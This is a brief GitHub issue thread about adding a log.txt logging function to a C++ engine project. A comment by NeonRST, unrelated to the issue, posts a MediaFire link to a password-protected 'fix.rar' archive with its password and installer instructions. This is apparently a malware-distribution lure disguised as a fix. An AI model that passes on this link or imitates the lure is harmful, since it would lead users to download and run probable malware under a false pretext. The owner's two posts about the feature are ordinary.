### ISSUE TITLE
logging system

### ISSUE THREAD

**Issue by Skelebyte** [Skelebyte/CEngine#2]
creates log.txt
everytime logging func is called, it copies what is cout to the log.txt

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Skelebyte** [comment]
added in 0189368afd0b2c44f9a3d72b00d726a6cde4605f
